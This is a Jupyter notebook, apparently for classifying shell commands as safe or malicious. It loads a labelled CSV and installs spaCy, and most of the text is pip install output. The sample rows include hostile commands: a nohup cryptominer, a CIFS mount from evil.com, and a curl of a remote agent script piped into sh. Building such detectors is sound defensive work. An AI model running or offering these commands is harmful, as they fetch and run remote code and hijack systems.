In [ ]:
import pandas as pd

In [11]:
data=pd.read_csv('Dataset\commands-classification-cleaned.csv')

In [12]:
data.head()


,id,command,classification
0,1,find . -name '*.txt'; less file.txt,safe
1,2,man ls; help cd,safe
2,3,cd /tmp; nano example.txt,safe
3,4,cd /tmp; nano example.txt,safe
4,5,cd /tmp; nano example.txt,safe


In [13]:
data.tail()

,id,command,classification
357,358,cd /tmp; nohup ./cryptominer -a cryptonight -o...,malicious
358,359,mount -t cifs //evil.com/share /mnt -o user=us...,malicious
359,360,cd /; find . -type f -size -100k 2>/dev/null |...,malicious
360,361,cd /var/mail; grep -r -E -o '\b[A-Za-z0-9._%+-...,malicious
361,362,"curl -s hxxp://evil.com/agent.sh | sh; echo ""*...",malicious


In [2]:
!pip install spacy


  Using cached spacy-3.8.5-cp311-cp311-win_amd64.whl.metadata (28 kB)
  Using cached spacy_legacy-3.0.12-py2.py3-none-any.whl.metadata (2.8 kB)
  Using cached spacy_loggers-1.0.5-py3-none-any.whl.metadata (23 kB)
  Using cached murmurhash-1.0.12-cp311-cp311-win_amd64.whl.metadata (2.2 kB)
  Using cached cymem-2.0.11-cp311-cp311-win_amd64.whl.metadata (8.8 kB)
  Using cached preshed-3.0.9-cp311-cp311-win_amd64.whl.metadata (2.2 kB)
  Using cached thinc-8.3.6-cp311-cp311-win_amd64.whl.metadata (15 kB)
  Using cached wasabi-1.1.3-py3-none-any.whl.metadata (28 kB)
  Using cached srsly-2.5.1-cp311-cp311-win_amd64.whl.metadata (20 kB)
  Using cached catalogue-2.0.10-py3-none-any.whl.metadata (14 kB)
  Using cached weasel-0.4.1-py3-none-any.whl.metadata (4.6 kB)
  Using cached typer-0.15.2-py3-none-any.whl.metadata (15 kB)
  Using cached tqdm-4.67.1-py3-none-any.whl.metadata (57 kB)
  Using cached numpy-2.2.4-cp311-cp311-win_amd64.whl.metadata (60 kB)
  Using cached requests-2.32.3-py3-none-a

  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.

[notice] A new release of pip is available: 24.0 -> 25.0.1
[notice] To 

In [7]:
# Install spacy if not already installed
%pip install spacy

import spacy

  Using cached jinja2-3.1.6-py3-none-any.whl.metadata (2.9 kB)
  Using cached click-8.1.8-py3-none-any.whl.metadata (2.3 kB)
  Using cached MarkupSafe-3.0.2-cp310-cp310-win_amd64.whl.metadata (4.1 kB)
  Using cached markdown_it_py-3.0.0-py3-none-any.whl.metadata (6.9 kB)
  Using cached wrapt-1.17.2-cp310-cp310-win_amd64.whl.metadata (6.5 kB)
  Using cached mdurl-0.1.2-py3-none-any.whl.metadata (1.6 kB)
   ---------------------------------------- 0.0/12.2 MB ? eta -:--:--
   --- ------------------------------------ 1.0/12.2 MB 6.3 MB/s eta 0:00:02
   -------- ------------------------------- 2.6/12.2 MB 7.6 MB/s eta 0:00:02
   ---------------- ----------------------- 5.0/12.2 MB 8.6 MB/s eta 0:00:01
   ------------------------ --------------- 7.6/12.2 MB 9.4 MB/s eta 0:00:01
   ---------------------------------- ----- 10.5/12.2 MB 10.6 MB/s eta 0:00:01
   ---------------------------------------- 12.2/12.2 MB 10.8 MB/s eta 0:00:00
   ---------------------------------------- 0.0/2.0 MB ? e

In [10]:
import spacy